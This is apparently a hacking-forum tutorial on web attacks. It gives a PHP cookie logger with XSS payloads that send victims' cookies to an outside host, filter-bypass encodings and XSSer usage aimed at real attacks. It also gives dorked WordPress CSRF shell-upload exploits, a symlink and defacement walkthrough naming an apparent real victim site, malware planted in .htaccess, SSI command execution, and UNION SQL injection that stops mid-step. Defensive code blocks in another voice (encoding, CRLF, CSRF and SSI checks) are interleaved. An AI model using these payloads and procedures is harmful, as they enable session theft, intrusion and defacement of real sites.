Sites on which we can use this method are sites with a text input and a submit button, and
sites where a GET parameter is printed on the page.
e.g. of the GET method:
Code:
www.site.com/index.php?page=<script>alert("XSS")</script>
The command to check site vulnerability is:
Code:
<script>alert("XSS")</script>
Now I will explain what this command does:
<script> - opening script tag
alert("XSS") - a window will pop up saying "XSS"
</script> - closing script tag
4) XSS types
Cookie Stealing - we steal cookies from some user (commonly the admin) and put the cookie
in our browser, so when we go to the site we are already logged in.
Cross-Site Request Forgery - we send some commands without knowing the username.
XSS Worms - an "evil" script that has the ability to spread over the whole site.
Door-Forwarding - the script creates an iframe which will exploit something or start downloading some
virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.
5) Cookie Stealing
For cookie stealing we will need:
-Vulnerable site
-Web host for scripts
-php script
Put this script on some hosting:
cookie.php
Code:
<?php
// Append the cookie value received in the URL to a log file, one per line
$cookie = $_GET["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>
Script execution:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>
How does this work?
When some user logs on to a page with your cookie logger, you save his cookie. Then we take the
cookie and use it. So here is how we do it:
1) Open Mozilla
2) Open the Firebug add-on
3) Type the cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
from this cookie the name is PHPSESSID
from this cookie the value is db3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing
1) Deleting the script tag
e.g. if we type <script>alert("XSS")</script> and it prints only alert("XSS"), the script
deletes the tags <script> and </script>.
Here is how to bypass that protection: instead of <script>alert("XSS")</script> we add
<scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes
If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> then it is
magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works with String.fromCharCode.
Here is an example:
This is the link of our cookie logger: http://link.com/cookie.php. We would turn
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>
This works when your code needs ' or "; when you use integers you do not need ' or ".
Here http://www.link.com/cookie.php?cookie= was converted to decimal codes with this
tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php
6) Bypass XSS Filters
[1] Types of filters :
[+]Bypass magic_quotes_gpc (if it's on)
[+]Bypass with encoding in full html
[+]Bypass with obfuscation
[+]Bypass with the trying-around method
[+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesn't allow ", / and ' (it
depends).
To bypass it we use :
String.fromCharCode()
We write our code in the (), encoded in ASCII.
Example :
String.fromCharCode(107, 51, 110, 122, 48)
(Here I encoded k3nz0 in ASCII: 107, 51, 110, 122, 48)
And we use it :
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
We will see : k3nz0
We bypassed magic_quotes_gpc :)
[+] Bypass with encoding in full html :
Very simple, we have to encode our code in full HTTP!
Our code: <script>alert('i am here')</script>
And in full HTTP :
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now, you can inject it :) !
Notice that you can use the tool "Coder" to encode it in full HTTP
We bypassed the filter.
[+] Bypass with obfuscation :
Very simple too; this filter doesn't allow, for example, these words :
-script
-alert
To bypass it, you change "script" to, for example, "sCriPt", and "alert" to
"ALerT" !
For example :
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.
[+] Bypass with the trying-around method :
Generally, it is used in search scripts; we just add "> at the beginning to close the current
field. Example :
http://target.com/search.php?search="><script>alert("hello")</script>
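Each bypass above defeats a blacklist, and the fix on the defending side is not a longer blacklist but output encoding for the context the value lands in. As an added example (my own code, not from the tutorial or any project), the Python below runs the page's own payload shapes through a naive tag-stripping filter and through html.escape() and checks whether a script opener survives; the payload list, template strings and function names are constructed for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# Constructed test inputs reproducing the filter-bypass forms shown on the page
# (assumed attacker inputs for the demonstration, not captured traffic).
PAYLOADS = [
    '<script>alert("XSS")</script>',                                   # textbook probe
    '<ScriPt>ALeRt("i am here")</scriPt>',                             # case mutation
    '<scr<script>ipt>alert("XSS")</scr</script>ipt>',                  # nested-tag trick
    '"><script>alert("hello")</script>',                               # attribute break-out
    '%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20'
    '%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E',                   # URL-encoded ("full html")
]

def naive_filter(raw):
    """Blacklist of the kind the page defeats: delete the two literal tags."""
    return raw.replace("<script>", "").replace("</script>", "")

def render_unsafe(raw):
    """Filter runs on the raw query string, then the framework URL-decodes and the
    value is pasted into the page unencoded (the vulnerable order of operations)."""
    return "<p>Results for: " + unquote(naive_filter(raw)) + "</p>"

def render_safe(raw):
    """Decode first, then HTML-encode for the text context. No blacklist needed:
    '<', '>' and the quote characters can no longer start markup, whatever the
    casing or nesting of the input."""
    return "<p>Results for: " + html.escape(unquote(raw), quote=True) + "</p>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)

def contains_script_tag(markup):
    """True when the rendered HTML still carries an executable script opener."""
    return bool(SCRIPT_TAG.search(markup))

if __name__ == "__main__":
    for p in PAYLOADS:
        print(contains_script_tag(render_unsafe(p)), contains_script_tag(render_safe(p)), p)
```

The textbook probe is the only one the blacklist stops, which is exactly why such filters look like they work; the encoded output contains no raw angle bracket for any input. Pair this with the HttpOnly flag on the session cookie, which keeps it out of document.cookie, so even a script that does run cannot read the value the cookie-stealing section depends on.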
7) XSSER Framework
Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final
Injection(s)]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded
*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler,ask, etc.
See dork.py file to check for available engines)
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3)
*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:
--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code
*Miscellaneous*:
--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered
Example :
* Simple injection from URL:
$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads
character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using character encoding mutations (first,
change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third,
reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to
"20" and using multithreads (5 threads):
$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character
encoding to bypass filters:
$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):
$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:
$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP
Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM
shadow space (no server logging!) and if exists any "hole", applying your manual final payload
"malicious" code (ready for real attacks!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link
(is.gd) with a valid DoS (Denegation Of Service) browser client payload:
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic
payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between
petitions to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and in Cookie
parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and
creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):
$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to
be uploaded.
$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to
http://identi.ca
(federated XSS pentesting botnet)
$ python xsser.py -d "login.php" --De "duck" --publish
-------------------
* Create a .swf movie with XSS code injected
$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results
$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed
in a shorteredlink, on positive resultsfounded.XSSreal-time exploiting.
$ pythonxsser.py -u"host.com"--auto--Dcp--Fp"enter_your_code_here" --short"is.gd"
-------------------
* ExploitingBase64 code encodingin META tag (rfc2397) in a manual payload of a vulnerable target.
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--payload"valid_vector_injected" --B64
-------------------
* Exploitingour "own" -remote code- ina payload discoveredusingfuzzingand launch it in a browser
directly
$ pythonxsser.py -u"host.com"-g"vulnerable_path"--auto--Fr"my_host/path/code.js" --launch
CRLF :
1) CRLF?
Short for Carriage Return and Line Feed. CRLF injection is very easy to use. It is effectively
adding a new line (\n) inside data that the application later prints line by line.
2) Vulnerable places
Vulnerable places are anywhere a line break has a meaning. In this tutorial I'm gonna use a chat.
3) Exploiting vulnerability and protection
Let's say that when you send a message, the chat looks like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right
saiR login database is deleted. Log in here till I get it back:
http://vulnerablesite.com/login.php
If the chat is vulnerable, it's gonna look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in
here till I get it back: http://vulnerablesite.com/login.php
We wrote the second message "from Admin" ourselves; users will think that Admin actually sent it and will log
in to the site we gave them. With that login page we are gonna keylog the site logins.
4) Vulnerable script
e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
if(!empty($_POST['message']))
{
// htmlspecialchars() only encodes <, >, & and quotes; \r and \n pass through untouched,
// so a line break inside the message is stored and later printed as a new chat line
$message = htmlspecialchars($_POST['message']);
// rest of code to send msg
}
}
?>
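The fix for the script above is to strip line-break characters from a message before it is stored, not just HTML-encode it. The following is an added example, not code from the original tutorial: it neutralises line breaks in a chat-style message store and flags messages that contained them. The chat line format and the sample messages are constructed for this example.

```python
"""Added example (not from the original tutorial): neutralising CRLF injection in a
chat-style message store, plus a detector for messages that contain line breaks.
The chat format and sample messages are constructed for this example."""
import re
from datetime import datetime
from typing import Iterable, List, Tuple

# Every character a terminal or HTML renderer might treat as a line break, including
# vertical tab, form feed, NEL and the Unicode line/paragraph separators. A run of
# them collapses to one space.
LINE_BREAKS = re.compile(r"[\r\n\x0b\x0c\x85\u2028\u2029]+")


def is_crlf_injection(message: str) -> bool:
    """True when a single chat message contains any line-break character."""
    return LINE_BREAKS.search(message) is not None


def sanitize_message(message: str) -> str:
    """Collapse line breaks to a single space so that one submitted message can only
    ever render as one chat line."""
    return LINE_BREAKS.sub(" ", message).strip()


def format_line(timestamp: datetime, user: str, message: str) -> str:
    """Render one chat line the way the tutorial's chat does, but from sanitized input.
    The username is sanitized too: it is attacker-controlled at registration time."""
    stamp = f"{timestamp.day}.{timestamp.month}.{timestamp.year} {timestamp:%H:%M}"
    return f"{stamp} - {sanitize_message(user)}: {sanitize_message(message)}"


def render_chat(entries: Iterable[Tuple[datetime, str, str]]) -> List[str]:
    """Render (timestamp, user, raw_message) tuples; returns one line per message."""
    return [format_line(ts, user, msg) for ts, user, msg in entries]


# Constructed sample input reproducing the tutorial's scenario: the last message
# embeds a CRLF followed by a forged "Admin" line.
SAMPLE_ENTRIES = [
    (datetime(2012, 4, 1, 10, 29), "fodex", "Why login page is down?"),
    (datetime(2012, 4, 1, 10, 30), "saiR",
     "Ok go ahead...\r\n1.4.2012 10:30 - Admin: Log in here till I get it back: "
     "http://vulnerablesite.com/login.php"),
]

if __name__ == "__main__":
    for ts, user, msg in SAMPLE_ENTRIES:
        if is_crlf_injection(msg):
            print(f"ALERT: line break inside message from {user!r}")
    for line in render_chat(SAMPLE_ENTRIES):
        print(line)
```

The forged "Admin" text still appears, but inside saiR's own line, so the spoofed authorship is gone. Logging the alert separately is worth keeping: a legitimate chat client never sends a raw CR or LF, so the detector has a very low false-positive rate.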
CSRF :
1) CSRF?
Short for Cross Site Request Forgery. CSRF is a mix of XSS and LFI. It is used to execute
an action as another user without knowing that user's username or password.
2) Vulnerable places
It can be used when the site performs state-changing actions with the GET method. If the CSRF is done successfully, the attacker can change the
password of some user. The most common vulnerable places are avatars, because the victim's browser fetches the avatar URL with the victim's own session cookies.
3) Exploiting vulnerability
Let's say we have a profile link:
Code:
http://www.link.com/profile.php
where you can see user data (username, avatar, email...).
Now a user edits his profile using e.g.
Code:
http://www.link.com/edit_profile.php
Now, instead of an avatar link, we are gonna put the link of the profile editing page together with the new value, passed with the
GET method.
NOTE: The profile editing has to accept the GET method, otherwise we won't be able to attack.
Add as avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword
password is the name of the input (it can be different; it's best to check the source code).
Now when we look at the avatar we won't be able to see a picture (like there is no picture). When another
user views your avatar, if the attack was successful, his password is gonna be changed to the one we put.
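What stops the avatar trick is on the server side: a password change must only be honoured when it arrives by POST, carries a per-session anti-CSRF token, and does not come from a foreign origin. The block below is an added example and not code from the original tutorial; the `Request`/`Session` classes, the `edit_profile` and `csrf_check` names, and the site origin `http://www.link.com` (taken from the tutorial's example URLs) are this example's own assumptions.

```python
"""Added example (not part of the original tutorial): the server-side checks that stop
the avatar-based CSRF above. A password change is only honoured when (1) it arrives by
POST, (2) it carries a per-session anti-CSRF token that matches the one stored
server-side, and (3) the Origin/Referer header, when present, names our own site.
The request representation and the session store are constructed for this example."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

SITE_ORIGIN = "http://www.link.com"  # hypothetical site, as in the tutorial


@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    password: str = "old-password"


@dataclass
class Request:
    method: str
    params: dict              # query-string or form fields
    session: Session
    headers: dict = field(default_factory=dict)


def csrf_check(req: Request) -> Optional[str]:
    """Return a rejection reason, or None when the request is acceptable."""
    if req.method != "POST":
        # GET must never change state: an <img src=...> can only ever issue a GET
        return "state-changing request must use POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if origin is not None and origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return "cross-site origin"
    supplied = req.params.get("csrf_token", "")
    # constant-time comparison so the token cannot be guessed byte by byte
    if not hmac.compare_digest(supplied, req.session.csrf_token):
        return "missing or wrong anti-CSRF token"
    return None


def edit_profile(req: Request) -> str:
    """Hardened equivalent of edit_profile.php: changes the password only when csrf_check passes."""
    reason = csrf_check(req)
    if reason is not None:
        return f"rejected: {reason}"
    req.session.password = req.params["password"]
    return "password changed"


def render_edit_form(session: Session) -> str:
    """The form a legitimate page embeds: it carries the session's token as a hidden field."""
    return (
        '<form method="post" action="/edit_profile.php">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input type="password" name="password"><input type="submit"></form>'
    )


if __name__ == "__main__":
    victim = Session(user="victim")
    # The tutorial's avatar attack: the victim's browser issues a GET with the attacker's value.
    print(edit_profile(Request("GET", {"password": "newpassword"}, victim)))
    # A forged POST from another site (e.g. an auto-submitting form) carries a foreign Origin.
    print(edit_profile(Request("POST", {"password": "newpassword"}, victim,
                               {"Origin": "http://evil.example"})))
    # The genuine form submission carries the session token.
    print(edit_profile(Request("POST", {"password": "s3cret", "csrf_token": victim.csrf_token},
                               victim, {"Origin": SITE_ORIGIN})))
```

The three checks are layered on purpose: the POST-only rule alone defeats the avatar/img vector, the token defeats auto-submitting forms on attacker pages, and the Origin check catches the case where a token has leaked. The token is compared with `hmac.compare_digest` rather than `==` so its comparison time does not depend on how many leading bytes match.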
4) Example Of CSRF File Uploading Vulnerability.
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/amplus
Exploit & POC :
http://site-target/wp-content/themes/amplus/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/dimension
Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
3. Wordpress Euclid Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/euclid_v1
Exploit & POC :
http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
4. Wordpress theCotton Themes CSRF File Upload Vulnerability
Dork :
inurl:wp-content/themes/thecotton_v114/
Exploit & POC :
http://site/[path]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
Server Side Includes | Server Side Inclusion :
1) Introduction Server Side Includes
Server Side Includes (SSI) let us do some things faster on sites. Through SSI we can update
a DB, send mails and use many other functions. SSI works as if someone ran a script on that site.
The default extension for SSI files is .shtml.
To get SSI working, the directory where the .shtml file is located must contain an .htaccess file, which
holds the configuration.
SSI is disabled by default; you can enable it by creating a new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes
2) SSI creating
We start a directive with <!--#
A simple directive looks like this:
<!--#<command> <variable>=<variable content>-->
Code:
<command> -
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date
With --> we end the directive.
script e.g.
Code:
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->
3) Server Side Inclusion
A Server Side Inclusion attack is a very useful attacking method. For this it's recommended to have
basic knowledge of Bash and Batch programming.
A site is vulnerable to SSI injection when the extensions '.shtml', '.shtm' or '.stm' are handled as server-parsed in the Apache
config file and user-supplied content ends up inside such a page.
e.g. we can create a file with the next directive:
Code:
<!--#exec cmd='ls -la'-->
Save this as a .shtml file and open it on the site.
I think you already know what is going to happen.
Hope this helped you!
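From the defender's side, the two useful controls are finding `exec` directives in content that should never contain them and disarming the `<!--#` opener in user input before it is written into a server-parsed page. The scanner below is an added example and not code from the original tutorial; the directive names are the Apache mod_include set listed above, and the sample .shtml page is constructed.

```python
"""Added example (not from the original tutorial): a scanner that finds SSI directives
in server-parsed files and in untrusted input and reports the ones that execute
commands, plus a neutraliser for text that will be written into a .shtml page.
Directive names are the Apache mod_include set; the sample page is constructed."""
import re
from typing import Dict, List, Tuple

# <!--#cmd attr="value" attr2='value' -->   (attribute values may use " or ')
SSI_DIRECTIVE = re.compile(
    r"""<!--#\s*(?P<cmd>[a-z]+)\s*(?P<attrs>(?:[a-z_]+\s*=\s*(?:"[^"]*"|'[^']*')\s*)*)-->""",
    re.IGNORECASE,
)
ATTR = re.compile(r"""([a-z_]+)\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.IGNORECASE)

# exec runs a shell command (cmd=) or a CGI program (cgi=); it is the directive that
# turns an SSI injection into command execution, so it is the one to alert on.
HIGH_RISK = {"exec"}


def parse_directives(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Return [(command, {attr: value}), ...] for every SSI directive in text."""
    found = []
    for m in SSI_DIRECTIVE.finditer(text):
        # findall gives (name, double-quoted value, single-quoted value); one of the two is ''
        attrs = {name.lower(): dq or sq for name, dq, sq in ATTR.findall(m.group("attrs"))}
        found.append((m.group("cmd").lower(), attrs))
    return found


def risky_directives(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Only the directives that execute something on the server."""
    return [(cmd, attrs) for cmd, attrs in parse_directives(text) if cmd in HIGH_RISK]


def neutralize(text: str) -> str:
    """Disarm untrusted text before it is written into a server-parsed page: breaking
    the '<!--#' opener means mod_include no longer recognises a directive, and the
    HTML-escaped form still displays as the user typed it."""
    return text.replace("<!--#", "&lt;!--#")


# Constructed .shtml content mixing a harmless include, the tutorial's exec example,
# and a plain HTML comment that merely looks like a directive.
SAMPLE_PAGE = """<html><body>
<!--#include file="header.txt" -->
<!--#echo var="DATE_LOCAL" -->
<!-- plain html comment, not a directive -->
<!--#exec cmd='ls -la'-->
</body></html>"""

if __name__ == "__main__":
    for cmd, attrs in parse_directives(SAMPLE_PAGE):
        level = "HIGH" if cmd in HIGH_RISK else "info"
        print(f"[{level}] {cmd} {attrs}")
    print(neutralize("<!--#exec cmd='id'-->"))
```

Running the scanner over a web root catches both a developer's forgotten `exec` and an attacker-planted one; pairing it with `Options IncludesNOEXEC` instead of `Includes` in the .htaccess shown above removes the `exec` directive from mod_include entirely while keeping `include` and `echo` available.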
Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] Go to [sec. info] in your shell, then [readable : etc/passwd <view>]
4] Copy all username & passwd entries from [ etc/passwd ]
5] Paste them in [ http://site.com/contact.php ], [ config fucker ] tab.
6] Now open both of your links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] On the configweb page [ you have some text that contains user & password ] [ these files are
the details of reverse or linked websites ]
8] Now log in to them using database.php [ change password in database ]
9] Then log in to the main site and deface their index.php page.
Malware Attachment On Website :
1] Go to the Public Html tab on your 404.php shell,
2] open .htaccess on your shell
3] and paste your malware code.
Sql injection String & Union based :
1. Sql injection String based
[1] Description
In String based SQL injection :
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable
to SQLi)
[2] Example
Solution to this issue in order to hack a site with String Based SQL injection:
The answer to this problem is to use the following format while trying to hack a site with
SQLi:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query: the quote closes the string literal the
parameter is embedded in, and --+ (the + is decoded as a space) comments out the rest of the original query.
id=X' order by--+
Alright, now that you've got the point, let's try String Based on some of the other types of SQL
injection, shall we?
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since it'll be an example for our process
2. Obtaining the Databases
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of
my tutorials to progress further in this step
3. Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where
table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
